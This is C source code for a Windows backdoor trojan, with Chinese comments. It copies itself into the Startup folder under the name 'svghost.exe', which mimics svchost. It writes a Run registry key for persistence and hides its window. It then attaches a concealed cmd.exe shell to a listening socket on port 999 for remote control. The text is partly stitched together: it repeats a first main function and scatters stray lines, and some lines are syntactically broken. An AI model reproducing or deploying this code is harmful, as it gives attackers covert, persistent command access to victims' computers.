#include<windows.h>

#include<stdio.h>

int main(void){

char FileName[MAX_PATH];//存儲程序自身的絕對路徑

char TempPath[MAX_PATH];//存儲系統(tǒng)存放路徑，主要獲取系統(tǒng)盤盤符

char TempBuffer[MAX_PATH];

GetModuleFileName(NULL,FileName,sizeof(FileName));

GetSystemDirectory(TempPath,sizeof(TempPath));

sprintf(TempBuffer,"%c%c\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\torjan.exe",TempPath[0],TempPath[1]);

CopyFile(FileName,TempBuffer,TRUE); //將程序復(fù)制到啟動文件夾中

return 0;

}

GetPrivateProfileStringA("Main", "KeyName", "kinni", key_name, sizeof(key_name), ".\\config.ini");

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));

#pragma comment(lib,"ws2_32.lib")

//設(shè)置連接器選項

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

#include <winsock2.h>

#include<windows.h>

#include<stdio.h>

#define MasterPort 999 //定義監(jiān)聽端口

void open_telnet(){

WSADATA WSADa;//用來存儲被WSAStartup函數(shù)調(diào)用后返回的win sockets數(shù)據(jù)

sockaddr_in SockAddrin;

SOCKET CSocket, SSocket;

int AddrSize;

PROCESS_INFORMATION Processinfo;

STARTUPINFO Startupinfo;

char szCMDPath[255];

/配內(nèi)存資源，初始化數(shù)據(jù)

ZeroMemory(&amp;Processinfo, sizeof(PROCESS_INFORMATION));

ZeroMemory(&amp;Startupinfo, sizeof(STARTUPINFO));

ZeroMemory(&amp;WSADa, sizeof(WSADATA));

//獲取CMD路徑

GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));

//加載ws2_32.dll

WSAStartup(0x202, &amp;WSADa);

//設(shè)置本地信息和綁定協(xié)議，建立socket

SockAddrin.sin_family = AF_INET;

SockAddrin.sin_addr.s_addr = INADDR_ANY;

SockAddrin.sin_port = htons(MasterPort);

CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

//設(shè)置綁定斷端口999

bind(CSocket, (sockaddr*)&amp;SockAddrin, sizeof(SockAddrin));

//設(shè)置服務(wù)器監(jiān)聽端口

listen(CSocket, 1);

AddrSize = sizeof(SockAddrin);

//開始連接遠(yuǎn)程服務(wù)器，并配置隱藏窗口結(jié)構(gòu)體

SSocket = accept(CSocket, (sockaddr*)&amp;SockAddrin, &amp;AddrSize);

Startupinfo.cb = sizeof(STARTUPINFO);

Startupinfo.wShowWindow = SW_HIDE;

Startupinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;

Startupinfo.hStdInput = (HANDLE)SSocket;

Startupinfo.hStdOutput = (HANDLE)SSocket;

Startupinfo.hStdError = (HANDLE)SSocket;

//創(chuàng)建匿名管道

CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &amp;Startupinfo, &amp;Processinfo);

WaitForSingleObject(Processinfo.hProcess, INFINITE);

CloseHandle(Processinfo.hProcess);

CloseHandle(Processinfo.hThread);

//關(guān)閉進(jìn)程句柄

closesocket(CSocket);

closesocket(SSocket);

WSACleanup();

//關(guān)閉連接卸載ws2_32.dll

}

int regedit(HKEY key, const char* reg_name, const char* key_name, const char* key_value)

{

HKEY hkResult;

int ret=RegOpenKeyEx(key, reg_name, 0, KEY_ALL_ACCESS, &hkResult);

if(ret != 0)

return ret;

ret=RegSetValueEx(hkResult, key_name, 0, REG_EXPAND_SZ, (CONST BYTE*)key_value, 75);

if(ret==0)

{

RegCloseKey(hkResult);

return 0;

}

else

{

return ret;

}

}

int autopen(const char* key_name, const char* process_path)

{

char reg_name[] = “Software\Microsoft\Windows\CurrentVersion\Run”;

return regedit(HKEY_LOCAL_MACHINE, reg_name, key_name, process_path);

}

int main(void)

{

char key_name[100];

char process_path[1024];

///寫入啟動文件夾

char FileName[MAX_PATH];//存儲程序自身的絕對路徑

char TempPath[MAX_PATH];//存儲系統(tǒng)存放路徑，主要獲取系統(tǒng)盤盤符

char TempBuffer[MAX_PATH];

GetModuleFileName(NULL,FileName,sizeof(FileName));

GetSystemDirectory(TempPath,sizeof(TempPath));

sprintf(TempBuffer,"%c%c\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\svghost.exe",TempPath[0],TempPath[1]);

CopyFile(FileName,TempBuffer,TRUE); //將程序復(fù)制到啟動文件夾中

///寫入注冊表///

GetPrivateProfileStringA("Main", "KeyName", "kinni", key_name, sizeof(key_name), ".\\config.ini");

GetPrivateProfileStringA("Main", "ProcessPath", "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\svghost.exe", process_path, sizeof(process_path), ".\\config.ini");

int ret = autopen(key_name, process_path);

open_telnet();//遠(yuǎn)程telnet

return 0;

}